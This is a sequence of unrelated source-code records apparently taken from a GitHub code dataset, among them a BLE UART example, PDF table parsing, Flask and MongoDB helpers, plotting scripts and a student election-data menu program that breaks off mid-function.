RX_CHARACTERISTIC = '6E400002-B5A3-F393-E0A9-E50E24DCCA9E'\n \n def __init__(self, tx_obj):\n super().__init__(self.RX_CHARACTERISTIC)\n self.flags = ['write', 'write-without-response']\n self.write_callback = self.write\n self.tx_obj = tx_obj\n \n def write(self, value, options):\n print('Raw bytes:', value)\n print('With options:', options)\n 
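# Editor's note (assumption, not in the original file): BLE GATT write values typically\n # arrive as a sequence of ints rather than a bytes object, hence the bytes(value)\n # conversion below before decoding to text.\n 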
print('Text value:', bytes(value).decode('utf-8'))\n self._update_tx(value)\n \n def _update_tx(self, value):\n if self.tx_obj[0]:\n print(\"Sending\")\n self.tx_obj[0].set_value(value)\n \n class TX(blepy.Characteristic): \n TX_CHARACTERISTIC = '6E400003-B5A3-F393-E0A9-E50E24DCCA9E'\n \n def __init__(self, tx_obj):\n super().__init__(self.TX_CHARACTERISTIC)\n self.flags = ['notify']\n self.notify_callback = self.notify\n self.tx_obj = tx_obj\n \n def notify(self, notifying, characteristic):\n if notifying:\n self.tx_obj[0] = characteristic\n else:\n self.tx_obj[0] = None\n \n \ndef main(adapter_address):\n # Create peripheral\n uart = UARTPeripheral(adapter_address)\n \n # Publish peripheral and start event loop\n uart.publish()\n\n\nif __name__ == '__main__':\n main(blepy.Adapter.get_available_address()) \n","repo_name":"TrinaryLabs/blepy","sub_path":"examples/ble_uart.py","file_name":"ble_uart.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"7199600120","text":"\nimport camelot\nimport pandas as pd\nimport PyPDF2\nimport numpy as np\nimport glob\nfrom helpers.tools.table_utils import remove_empty_columns, remove_empty_rows, table_regex\nfrom pathlib import PureWindowsPath\nfrom db_custom import insert_item\ndef clean_table(table):\n df = table.df\n df = df.dropna(axis=1, how='all')\n df = df.dropna(axis=0, how='all')\n for column in df:\n df[column] = df[column].str.strip()\n #romove the last row\n df = df.drop(df.index[-1])\n #\n\n table.df=df\n #remove /n in the header\n\n for column in table.df:\n table.df[column] = table.df[column].str.replace('\\n','')\n \n #remove the first row\n table.df = table.df.drop(table.df.index[0])\n return table\n\n\ndef remove_table(table):\n table=table.df\n if table.empty:\n return None \n elif len(table.columns) == 1 or len(table.columns) == 2:\n return None\n elif table_regex(table,\"PART NUMBER\"):\n table=table.replace('', np.nan).groupby(0).first().reset_index()\n return table\n elif table_regex(table,\"PRODUCTNO\"):\n table=table.replace('', np.nan).groupby(0).first().reset_index()\n\n return table\n elif table_regex(table, \"PIEZA\"):\n table=table.replace('', np.nan).groupby(0).first().reset_index()\n return table\n elif table_regex(table, \"DESCRIPCION\"):\n table=table.replace('', np.nan).groupby(0).first().reset_index()\n\n return None\ndef getPages(filename):\n pdfFileObj = open(filename, 'rb')\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n num_pages = pdfReader.numPages\n return num_pages\n\ndef getTables(filename):\n #C:\\Users\\javie\\OneDrive\\Documentos\\easy\\pdfs\\javier.alejandro.flores.2@gmail.com\\2022-10-03_14-12-29_7.pdf\n filename = PureWindowsPath(filename)\n filename = str(filename)\n tables = camelot.read_pdf(filename, pages='1-end', flavor=\"stream\")\n pieces=pd.DataFrame()\n for table in tables:\n table = clean_table(table)\n table = remove_table(table)\n if table is not None:\n table = remove_empty_columns(table)\n table = remove_empty_rows(table)\n pieces = pd.concat([pieces,table])\n \n for index, row in pieces.iterrows():\n insert_item(Quantity_items=row[0],Mesure_items=row[1], Description_items=row[4],Cost_items=row[5])\n\n return pieces \n \n","repo_name":"javierIA/spaceFacturas","sub_path":"helpers/tools/ssc.py","file_name":"ssc.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71452959122","text":"import 
sys\nsys.stdin = open(\"dictionary.txt\", \"r\")\n\n\n\nfor TC in range(1, int(input())+1):\n N = int(input())\n case = [0]*N\n for i in range(N):\n case[i] = input()\n","repo_name":"dowookims/ProblemSolving","sub_path":"algospot/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10617963352","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask_app.models.ninja import Ninja\n\nclass Dojo:\n def __init__( self , data ):\n self.id = data['id']\n self.name = data['name']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.ninjas = []\n \n #dojo model create\n @classmethod\n def dojo_save( cls , data ):\n query = \"\"\"\n INSERT INTO dojos \n (name) \n VALUES (%(name)s);\n \"\"\"\n result = connectToMySQL('dojo_ninja').query_db(query, data) \n return result\n\n #dojo model read\n @classmethod\n def get_dojos(cls):\n query = \"SELECT * FROM dojos;\"\n results = connectToMySQL('dojo_ninja').query_db(query)\n dojos = []\n for dojo in results:\n dojos.append( cls(dojo) )\n return dojos\n\n @classmethod\n def get_a_dojo_with_ninjas(cls, data):\n query = \"\"\"\n SELECT * FROM dojos\n LEFT JOIN ninjas\n ON dojos.id = ninjas.dojo_id\n WHERE dojos.id = %(id)s\n ;\"\"\"\n all_results = connectToMySQL('dojo_ninja').query_db(query, data)\n print(\"****************\", all_results)\n the_dojos_ninjas = cls(all_results[0])\n for info in all_results:\n new_ninja ={\n \"id\" : info[\"ninjas.id\"],\n \"first_name\" : info[\"first_name\"],\n \"last_name\" : info[\"last_name\"],\n \"age\" : info[\"age\"],\n \"created_at\" : [\"ninjas.created_at\"],\n \"updated_at\" : [\"ninjas.updated_at\"]\n }\n the_dojos_ninjas.ninjas.append(Ninja(new_ninja))\n return the_dojos_ninjas\n \n #dojo model update\n #dojo model delete","repo_name":"TracyMDoyle/dojos_and_ninjas","sub_path":"flask_app/models/dojo.py","file_name":"dojo.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38135969172","text":"'''input\n2\n1 5 10 3\n1 2 2 2\n'''\n\ndef gcd (a, b):\n if not a:\n return b\n return gcd (b % a, a)\n \nfor _ in range (int (input())):\n a, b, c, d = map (int, input().split())\n g = gcd (c, d)\n print (min ((a - b) % g, (b - a) % g)) ","repo_name":"enrro/TC2025-programacion-avanzada","sub_path":"proyectos/proyecto3/candies.py","file_name":"candies.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72285791761","text":"#!python3\n\nimport os\nimport sys\nimport logging\n\n# Given an environment variable and default value, fetch the variable from the environment\n# if it exists. If it does not exist, return the default value. If no default value is\n# define, then return an error. 
This allows us to have a default value when possible, or if\n# not possible, give an error.\ndef get_env(name, default=None):\n logging.info('Fetching ENV: ' + name)\n if name in os.environ:\n return os.environ[name]\n\n if default is not None:\n return default\n\n logging.error('Error: Missing required environment variable ' + name)\n sys.exit(1)\n\n# Set the logging level to be used based on a user input, allowing for consistent logging\n# from any of the scripts utilized.\ndef configure_logging(log_level):\n root = logging.getLogger()\n handler = logging.StreamHandler(sys.stdout)\n if log_level == 'debug':\n root.setLevel(level=logging.DEBUG)\n handler.setLevel(logging.DEBUG)\n elif log_level == 'info':\n root.setLevel(level=logging.INFO)\n handler.setLevel(logging.INFO)\n elif log_level == 'warning':\n root.setLevel(level=logging.WARNING)\n handler.setLevel(logging.WARNING)\n elif log_level == 'error':\n root.setLevel(level=logging.ERROR)\n handler.setLevel(logging.ERROR)\n elif log_level == 'critical':\n root.setLevel(level=logging.CRITICAL)\n handler.setLevel(logging.CRITICAL)\n else:\n print('Unknown log level, defaulting to INFO')\n root.setLevel(level=logging.INFO)\n handler.setLevel(logging.INFO)\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n root.addHandler(handler)\n\n","repo_name":"alexloney/vaultwarden_backup","sub_path":"scripts/include.py","file_name":"include.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30893300191","text":"import panel as pn\nimport hvplot.pandas\nimport pandas as pd\nimport numpy as np\n\nfrom js import console\nfrom pyodide_http import patch_all\npatch_all()\n\npn.extension(design='material')\n\ncsv_file = (\"https://raw.githubusercontent.com/holoviz/panel/main/examples/assets/occupancy.csv\")\ndata = pd.read_csv(csv_file, parse_dates=[\"date\"], index_col=\"date\")\nconsole.log(\"Downloaded data\")\n\n# Panel Widgets\nvariable_widget = pn.widgets.Select(name=\"variable\", value=\"Temperature\", options=list(data.columns))\nwindow_widget = pn.widgets.IntSlider(name=\"window\", value=30, start=1, end=60)\nsigma_widget = pn.widgets.IntSlider(name=\"sigma\", value=10, start=0, end=20)\nconsole.log(\"Set up widgets!\")\n\n# Interactive hvplot pipeline\n## Compute the outliers\ndata = data.interactive()\navg = data[variable_widget].rolling(window=window_widget).mean()\nresidual = data[variable_widget] - avg\nstd = residual.rolling(window=window_widget).std()\noutliers = np.abs(residual) > std * sigma_widget\n\n## Plot the average variable line together with the outliers as points\npipeline = (\n avg.hvplot(height=300, width=400, color=\"blue\", legend=False)\n * avg[outliers].hvplot.scatter(color=\"orange\", padding=0.1, legend=False)\n)\n\n# Compute the number of outliers\ncount = outliers.pipe(\n lambda s: pn.indicators.Number(\n name='Outliers count', value=s.sum(),\n colors=[(10, 'green'), (30, 'gold'), (np.Inf, 'red')]\n )\n)\n\n# Servable App\npn.Column(pipeline.widgets(), pn.Row(count.output(), pipeline.output())).servable(target='panel')\n","repo_name":"pyscript/examples","sub_path":"panel_with_hvplot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"38907956294","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 18 13:48:05 
2022\n\n@author: Yapicilab\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport glob\nimport os\nimport math\n\nos.chdir('G:\\\\My Drive\\\\local_search\\\\ZT')\nsome_df={}\ntimelist=sorted(os.listdir())\ntimelist.remove('desktop.ini')\nfor timing in timelist:\n fnames = sorted(glob.glob(timing+'/'+'*.csv'))\n inst_vel_all=[]\n for u in fnames: #goes thru files in the folder.\n df=pd.read_csv(u, header=None)\n df=df.dropna(axis=1, how='all')\n if(df.shape[1]==10):\n data_header = ['Time', 'Latency', 'Fx1', 'Fy1', 'Fx2', 'Fy2', 'Fx3', 'Fy3','Fx4','Fy4']\n elif(df.shape[1]==8):\n data_header = ['Time', 'Latency', 'Fx1', 'Fy1', 'Fx2', 'Fy2', 'Fx3', 'Fy3']\n elif(df.shape[1]==6):\n data_header = ['Time', 'Latency', 'Fx1', 'Fy1', 'Fx2', 'Fy2']\n elif(df.shape[1]==4):\n data_header = ['Time', 'Latency', 'Fx1', 'Fy1']\n df.columns=data_header\n latency=list(df['Latency'])\n latency[0]=0\n df['Time']=df['Time']-120\n for i in range(2,len(data_header),2):\n x_coord=list(df[data_header[i]])\n y_coord=list(df[data_header[i+1]])\n time=list(df['Time'])\n jumps=[]\n inst_vel=np.zeros_like(x_coord)\n for j in range(0,len(x_coord)-1,1):\n inst_vel[j]=np.sqrt((x_coord[j+1]-x_coord[j])**2+(y_coord[j+1]-y_coord[j])**2)/latency[j+1]\n \n # median_inst_vel=np.median(inst_vel)\n inst_vel_all.extend(inst_vel)\n newlist = [x for x in inst_vel_all if np.isnan(x) == False]\n some_df[timing]=newlist\n\n# some_df=some_df.dropna(axis=0)\nlabels, data2 = [*zip(*some_df.items())] # 'transpose' items to parallel key, value lists\nfig, ax = plt.subplots()\n\nax.boxplot(data2, showfliers=False)\n# ax=sns.stripplot(data2, size=2)\nax.set_xticklabels(labels)\nplt.show()\n","repo_name":"namanagrawal97/local_search","sub_path":"ZT time analysis.py","file_name":"ZT time analysis.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14447764687","text":"from pymongo import MongoClient\nimport traceback\n\nclass DB:\n def __init__(self, db_port = 27017, db = 'test', db_host = 'localhost', db_collection = 'company_details3'):\n self.HOST = db_host\n self.COLLECTION = db_collection\n self.PORT = db_port\n self.DATABASE = db\n\n def insert_details(self, data):\n try:\n client = MongoClient(self.HOST, self.PORT)\n db = client[self.DATABASE]\n db[self.COLLECTION].remove({'website':data['website']})\n db[self.COLLECTION].insert(data)\n except:\n traceback.print_exc()\n return False\n return True","repo_name":"prabhat27/CompanyDetails","sub_path":"db_handler.py","file_name":"db_handler.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19940343873","text":"from os import walk\r\nimport pygame\r\n\r\n\r\n#Convert image file into the list\r\ndef import_folder(path):\r\n export_file = []\r\n\r\n for _,__,image_files in walk(path):\r\n for image in image_files:\r\n full_path = path + '/' + image\r\n image_surface = pygame.image.load(full_path).convert_alpha()\r\n export_file.append(image_surface)\r\n\r\n return export_file\r\n","repo_name":"deceimo/mario-game","sub_path":"mario/code/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16927560107","text":"#\n# mains.py : containing the main menu system\n#\n\nfrom functionsB import *\nfrom 
functionsC import *\nfrom functionsD import * \nfrom DSATrees import *\n#from DSALinkedList import *\n#from DSAQueue import *\nimport math\nimport re\n#import string\n#import pandas as pd\n\n# Opening File for Task1 and Task2 ===========================================================\n\nwith open('HouseCandidatesDownload-20499.csv') as fileobj:\n csvdata = fileobj.read().splitlines()\ndata = []\nfor line in csvdata:\n splitline = line.split(',')\n data.append(splitline)\n\n# Opening File for Task3 ====================================================================\n\ndef openFile(filename): \n \"\"\"Read csv and replace dodgy stuff.\n\n Keyword arguments:\n filename -- csv file name\n \"\"\"\n find = '\"Shooters, Fishers and Farmers\"'\n replace = 'Shooters Fishers and Farmers'\n datalist = []\n with open(filename) as fileobj1:\n csvdata1 = fileobj1.read().splitlines()\n for line in csvdata1:\n line = str.replace(line, find, replace)\n splitline = line.split(',')\n datalist.append(splitline)\n return datalist\n\nact = openFile(\"PrefbyPP-ACT.csv\")\nnsw = openFile(\"PrefbyPP-NSW.csv\")\nvic = openFile(\"PrefbyPP-VIC.csv\")\nqld = openFile(\"PrefbyPP-QLD.csv\")\ntas = openFile(\"PrefbyPP-TAS.csv\")\nwa = openFile(\"PrefbyPP-WA.csv\")\nsa = openFile(\"PrefbyPP-SA.csv\")\nnt = openFile(\"PrefbyPP-NT.csv\")\n\n# Opening File for Task4 =====================================================================\n\nwith open('AirportDist1.0.csv') as fileobj:\n csvdata = fileobj.read().splitlines()\nairport = []\nfor line in csvdata:\n splitline = line.split(',')\n airport.append(splitline)\n\nwith open('ElectDist1.1.csv') as fileobj:\n csvdata = fileobj.read().splitlines()\nelect = []\nfor line in csvdata:\n splitline = line.split(',')\n elect.append(splitline)\n\n\nprint(\"\\nFILE OPENED\\n\")\n\n#Non-TaskSpecific Functions ===================================================================\n\n\ndef mainMenu():\n \"\"\"Display of main options.\"\"\"\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\t\\t\\t MAIN MENU\")\n print(\"----------------------------------------------------------------\")\n print(\"\\nWhat would you like to do today?\")\n print(\"\\tA. List of nominee\")\n print(\"\\tB. Nominee search\")\n print(\"\\tC. List by margin\")\n print(\"\\tD. Itinerary by margin\")\n print(\"\\t-- Press Enter to quit\")\n\ndef displayState():\n \"\"\"Displays all the states\"\"\"\n print(\"\\nWhat state would you like?\")\n print(\"A. ACT\\t\\t E. TAS\")\n print(\"B. NSW\\t\\t F. WA\")\n print(\"C. VIC\\t\\t G. SA\")\n print(\"D. QLD\\t\\t H. NT\")\n\ndef displayParty():\n \"\"\"Displays all the parties.\"\"\"\n print(\"\\nWhich party would you like?\")\n print(\"A. Liberal\\t\\t C. The Greens\")\n print(\"B. Labor\\t\\t D. The Nationals\")\n\ndef takeFilter():\n \"\"\"Takes user's filter option between state or party.\"\"\"\n print(\"\\nFilter by:\")\n print(\"A. State\\t\\t B. Party\")\n filterOpt = input(\"Selected filter is (A/B): \")\n list1 = [\"A\", \"B\"]\n while filterOpt.upper() not in list1:\n filterOpt = input(\"Selected filter is (A/B): \")\n return filterOpt.upper()\n\ndef ask_toWriteFile():\n writeFile = input(\"\\nWould you like to save report to a file? (Y/N) \")\n list1 = [\"Y\", \"N\"]\n while writeFile.upper() not in list1:\n writeFile = input(\"Would you like to save report to a file? (Y/N) \")\n if writeFile.upper() == \"Y\":\n ret = True\n elif writeFile.upper() == \"N\":\n ret = False\n return ret\n\n\n#Function for option A. 
LIST OF CANDIDATES ================================================\n\n\ndef AfilterMenu():\n \"\"\"Display of filter options, take order option and insert to tree.\"\"\"\n filterOpt = takeFilter()\n if filterOpt.upper() == \"A\":\n displayState()\n stateOpt = input(\"Selected state (ACT/NSW/VIC/etc): \")\n list1 = [\"ACT\", \"NSW\", \"VIC\", \"QLD\", \"TAS\", \"WA\", \"SA\", \"NT\"]\n while stateOpt.upper() not in list1:\n stateOpt = input(\"Selected state (ACT/NSW/VIC/etc): \")\n orderOpt = AorderMenu()\n insertTreeSTATE(stateOpt.upper(), orderOpt.upper())\n elif filterOpt.upper() == \"B\":\n displayParty()\n partyOpt = input(\"Selected party is (A-D): \")\n list1 = [\"A\", \"B\", \"C\", \"D\"]\n while partyOpt.upper() not in list1:\n partyOpt = input(\"Selected party is (A-D): \")\n insertTreePARTY(partyOpt.upper())\t#argument only filter, order is only A\n \n\ndef AorderMenu():\n \"\"\"Display of order (sort by) options.\"\"\"\n print(\"\\nOrder by:\")\n print(\"A. Surname\\nB. Party\")\n orderOpt = input(\"Selected order is (A-B): \")\n list1 = [\"A\", \"B\"]\n while orderOpt.upper() not in list1:\n orderOpt = input(\"Selected order is (A-B): \")\n return orderOpt.upper()\n\n\ndef insertTreeSTATE(state, order):\n \"\"\"Inserting items by state to a Binary Tree and preorder display.\n\n Keyword arguments:\n state -- chosen state\n order -- chosen order (sort by)\n \"\"\"\n if order == \"A\":\n #order by surname this will be the key value for BT\n i = 0\n size = 0\n BT = DSABinaryTrees()\n while i != len(data):\n if data[i][0] == state: #row i col 0 (stateAb)\n inKey = data[i][6]+\" \"+data[i][7]\n BT.insert(inKey, data[i][4]) #key=inKey, value=PartyName\n size = size + 1\n i = i + 1\n q = BT.inorderTraverse(BT.root, size)\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\nList of Candidates, filtered by State and ordered by Surname\\n\")\n a = iter(q.queue)\n try:\n n = q.queue.getSize()\n for i in range(n):\n curNode = next(a)\n print(curNode.divName)\n except StopIteration as error:\n print(error)\n print(\"\\n----------------------------------------------------------------\")\n\n #Ask to write file\n writefile = ask_toWriteFile() \n if writefile == True:\n print(\"\\n\\t\\tFile Written\")\n filename = \"ACandidateList-bySTATE\"+state+\"ordbySURNAME\"\n AfileWriteout(q, filename)\n \n elif order == \"B\":\n #FITLER BY STATE ORDER BY PARTYNAME\n i = 0\n size = 0\n BT = DSABinaryTrees()\n while i != len(data):\n if data[i][0] == state:\n inKey = data[i][4]+\"\\t| \"+data[i][6]+\" \"+data[i][7]\n #inKey is \"partyName | Fullname\" to avoid double key\n BT.insert(inKey, data[i][7]) #inValue is firstname (?)\n size = size + 1\n i = i + 1\n q = BT.inorderTraverse(BT.root, size)\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\nList of Candidates, filtered by State and ordered by Party\\n\")\n a = iter(q.queue)\n try:\n n = q.queue.getSize()\n for i in range(n):\n curNode = next(a)\n print(curNode.divName)\n except StopIteration as error:\n print(error)\n print(\"\\n----------------------------------------------------------------\")\n \n #Ask to write file\n writefile = ask_toWriteFile() \n if writefile == True:\n print(\"\\n\\t\\tFile Written\")\n filename = \"ACandidateList-bySTATE\"+state+\"ordbyPARTY\"\n AfileWriteout(q, filename)\n\n\ndef insertTreePARTY(party):\n \"\"\"Inserting items by party to a Binary Tree and preorder display.\n\n Keyword arguments:\n party -- chosen party\n order -- order is 
default by surname\n \"\"\"\n #PARTY FILTER SURNAME(DEFAULT) ORDER\n i = 0\n size = 0\n BT = DSABinaryTrees()\n if party == \"A\":\n party = \"LP\"\n elif party == \"B\":\n party = \"ALP\"\n elif party == \"C\":\n party = \"GRN\"\n elif party == \"D\":\n party = \"NP\"\n while i != len(data):\n if data[i][3] == party: #row i col 4 (partyNm)\n inKey = data[i][6]+\" \"+data[i][7]\n BT.insert(inKey, data[i][4]) #key=inKey, value=PartyName\n size = size + 1\n i = i + 1\n q = BT.inorderTraverse(BT.root, size)\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\n\\tList of Candidates, filtered by Party and ordered by Surname\")\n print(\"\\tPARTY NAME: \"+party+\"\\n\")\n a = iter(q.queue)\n try:\n n = q.queue.getSize()\n for i in range(n):\n curNode = next(a)\n print(curNode.divName)\n except StopIteration as error:\n print(error)\n print(\"\\n----------------------------------------------------------------\")\n\n #Ask to write file\n writefile = ask_toWriteFile() \n if writefile == True:\n print(\"\\n\\t\\tFile Written\")\n filename = \"ACandidateList-byPARTY\"+party+\"ordbySURNAME\"\n AfileWriteout(q, filename)\n\n\ndef AfileWriteout(q, filename):\n \"\"\"Write results into a txt file.\n\n Keyword arguments:\n q -- output queue used for display\n filename -- name of file to be written\n \"\"\"\n filename1 = filename + \".txt\"\n f = open(filename1, \"w+\")\n f.write(str(filename)+\"\\n\\n\")\n f.close()\n f = open(filename1, \"a+\")\n a = iter(q.queue)\n try:\n n = q.queue.getSize()\n for i in range(n):\n curNode = next(a)\n f.write(curNode.divName+\"\\n\")\n f.close()\n except StopIteration as error:\n print(error)\n \n\n\n\n# MENU STARTS HERE ============================================================\n\n\nmainMenu()\nchoice = input(\"Your Selection is (A-D):\\t\")\n\nwhile choice.upper() != \"\":\n\n if choice.upper() == \"A\":\n\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\n\\n\\t\\t\\tLIST OF NOMINEES\")\n #Takes filter opt, order opt, read file insert to tree, and display preorder xD\n #Save report to file or not?\n AfilterMenu()\t\n\n #Ask if want to display more?\n again = input(\"\\n\\nWould you like to display more? (Y/N): \")\n while again.upper() != \"N\" and again.upper() == \"Y\":\n AfilterMenu()\n again = input(\"\\n\\nWould you like to display more? (Y/N): \")\n\n elif choice.upper() == \"B\":\n\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\n\\n\\t\\t\\tNOMINEE SEARCH\")\n filterOpt = BfilterMenu() #A is state filter, B is party filter\n if filterOpt.upper() == \"A\":\n\n #Selecting filter and initialising BST\n displayState()\n stateOpt = input(\"Selected state (ACT/NSW/VIC/etc): \")\n list1 = [\"ACT\", \"NSW\", \"VIC\", \"QLD\", \"TAS\", \"WA\", \"SA\", \"NT\"]\n while stateOpt.upper() not in list1:\n stateOpt = input(\"Selected state (ACT/NSW/VIC/etc): \")\n binaryTree = insert_bySTATE(stateOpt.upper(), data)\n \n #Begin taking input, match and display\n print(\"\\nSearching process:\")\n substring = input(\"Enter substring of surname... \")\n while substring == \"\":\n print(\"\\n\\t\\tSubstring can not be empty. Try again.\\n\")\n substring = input(\"Enter substring of surname... 
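# AfileWriteout above calls f.close() inside the try block, so an exception
# raised mid-iteration leaves the file open. A with-block gives the same
# result while guaranteeing the close (sketch against the same queue
# interface used above; AfileWriteout_safe is a hypothetical name):
def AfileWriteout_safe(q, filename):
    with open(filename + ".txt", "w+") as f:
        f.write(filename + "\n\n")
        for node in q.queue:  # the queue is iterable, as used above
            f.write(node.divName + "\n")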
\")\n try:\n foundNode = binaryTree.find(substring.upper(), binaryTree.root)\t\t\n q = display_matchedInput(binaryTree, substring.upper())\n except MissingKeyTreeError as error:\n print(\"\\n\\t\\tNo match found.\")\n print(error)\n #if all entries for one division is already saved\n\n #Ask if user wants to write out report to file\n writefile = ask_toWriteFile() \n if writefile == True:\n print(\"\\n\\t\\tFile Written\")\n filename = \"BCandidateList-bySTATE\"+stateOpt.upper()+\"by\"+substring.upper()\n BfileWriteout(q, filename)\n \n\n elif filterOpt.upper() == \"B\":\n \n #Selecting filter and initialising BST\n displayParty()\n partyOpt = input(\"Selected party is (A-D): \")\n list1 = [\"A\", \"B\", \"C\", \"D\"]\n while partyOpt.upper() not in list1:\n partyOpt = input(\"Selected party is (A-D): \")\n binaryTree = insert_byPARTY(partyOpt.upper(), data) \n\n #Begin taking input, match and display\n print(\"\\nSearching process:\")\n substring = input(\"Enter substring of surname... \")\n while substring == \"\":\n print(\"\\n\\t\\tSubstring can not be empty. Try again.\\n\")\n substring = input(\"Enter substring of surname... \")\n try:\n foundNode = binaryTree.find(substring.upper(), binaryTree.root)\n q = display_matchedInput(binaryTree, substring.upper())\n print(q.getCount())\n except MissingKeyTreeError as error:\n print(\"\\n\\t\\tNo match found.\")\n print(error)\n\n #Ask if user wants to write out report to file\n writefile = ask_toWriteFile() \n if writefile == True:\n print(\"\\n\\t\\tFile Written\")\n filename = \"BCandidateList-byPARTY\"+partyOpt.upper()+\"by\"+substring.upper()\n BfileWriteout(q, filename)\n\n\n elif choice.upper() == \"C\":\n\n #Displaying options for state\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\n\\t\\tCALCULATING MARGINAL SEATS BY PARTY\")\n print(\"\\n\\nWhich party would you like?\")\n print(\"A. Labor\\t\\t B. Liberal\")\n partyOpt = input(\"Selected party is (A/B): \")\n list1 = [\"A\", \"B\"]\n while partyOpt.upper() not in list1:\n partyOpt = input(\"Selected party is (A/B): \")\n if partyOpt.upper() == \"A\":\n party = [\"ALP\", \"LaborParty\"]\n elif partyOpt.upper() == \"B\":\n party = [\"LP\", \"LiberalParty\"]\n\n #Ask for custom margin\n print(\"\\n\\nWould you like a custom margin? 
(default is 6%)\n")\n        marginOpt = input(\"Insert as integer or press enter \\t\")\n        if marginOpt == \"\":\n            m = 6\n        else:\n            while not marginOpt.isdigit(): #re-prompt until the input is a whole number\n                marginOpt = input(\"Insert as integer or press enter \\t\")\n            m = int(marginOpt)\n        print(\"\\nCalculating votes...\\n\") \n\n        #Calculating votes and margin through all states\n        ACT_divList = listDivisions_byState(act)\n        ACT_marginal = calculateMargin(act, party[0], ACT_divList, m)\n        print(\"ACT DONE (margin \"+str(m)+\"%)\\n\")\n        NSW_divList = listDivisions_byState(nsw)\n        NSW_marginal = calculateMargin(nsw, party[0], NSW_divList, m)\n        print(\"NSW DONE (margin \"+str(m)+\"%)\\n\")\n        VIC_divList = listDivisions_byState(vic)\n        VIC_marginal = calculateMargin(vic, party[0], VIC_divList, m)\n        print(\"VIC DONE (margin \"+str(m)+\"%)\\n\")\n        QLD_divList = listDivisions_byState(qld)\n        QLD_marginal = calculateMargin(qld, party[0], QLD_divList, m)\n        print(\"QLD DONE (margin \"+str(m)+\"%)\\n\")\n        TAS_divList = listDivisions_byState(tas)\n        TAS_marginal = calculateMargin(tas, party[0], TAS_divList, m)\n        print(\"TAS DONE (margin \"+str(m)+\"%)\\n\")\n        WA_divList = listDivisions_byState(wa)\n        WA_marginal = calculateMargin(wa, party[0], WA_divList, m)\n        print(\"WA DONE (margin \"+str(m)+\"%)\\n\")\n        SA_divList = listDivisions_byState(sa)\n        SA_marginal = calculateMargin(sa, party[0], SA_divList, m)\n        print(\"SA DONE (margin \"+str(m)+\"%)\\n\")\n        NT_divList = listDivisions_byState(nt)\n        NT_marginal = calculateMargin(nt, party[0], NT_divList, m)\n        print(\"NT DONE (margin \"+str(m)+\"%)\\n\")\n\n        #Option to write to file\n        writeout = input(\"\\nWould you like to save results to a txt file? Y/N \")\n        if writeout.upper() == \"Y\":\n            customName = input(\"\\nEnter name of output file without filetype\"+\n                               \"\\n(or press enter for default): \")\n            if customName == '':\n                filename1 = party[1]+\"_MarginalSeatList\"+str(m)+\"%.txt\"\n            else:\n                filename1 = customName+\".txt\"\n            f = open(filename1, \"w+\")\n            f.write(\"List of Marginal Seats of \"+party[1]+\" in Australia\\n\"+\n                    \"Margin used: \"+str(m)+\"%\\n\\n\")\n            f.close()\n            CfileWriteout(filename1, ACT_marginal)\n            CfileWriteout(filename1, NSW_marginal)\n            CfileWriteout(filename1, VIC_marginal)\n            CfileWriteout(filename1, QLD_marginal)\n            CfileWriteout(filename1, TAS_marginal)\n            CfileWriteout(filename1, WA_marginal)\n            CfileWriteout(filename1, SA_marginal)\n            CfileWriteout(filename1, NT_marginal)\n        \n\n    elif choice.upper() == \"D\":\n\n        #ask what marginal file to refer to\n        print(\"\\n----------------------------------------------------------------\")\n        print(\"\\n\\t\\tITINERARY BASED ON MARGINAL SEATS\")\n        print(\"\\nTo create itinerary, you must have an existing marginal\"\n              +\"\\nseat file saved for a certain party and certain margin.\")\n        #try to find file and use exception if not found\n        while True:\n            filename = askFilename()\n            print(\"filename is:\"+filename)\n            try:\n                fileobj = open(filename)\n                marginal = fileobj.readlines()\n            except OSError as error:\n                print(error.errno)\n            else:\n                break\n        print(\"out of while\")\n\n        #process the txt file using regex\n        marginList = readInputFile(marginal) \n\n        #all airports connect to other airports\n        #make the graph, connect the airports\n        #loc is for locations (so it makes sense :D )\n        loc = insertAirport(airport, marginList) \n\n        #read from elect and add to graph\n        loc = insertElect(loc, elect, marginList)\n\n        #edges are weighted, so use Dijkstra rather than a plain BFS\n        #only take to and from nodes that are in marginList\n        minutes = 0\n        for i in 
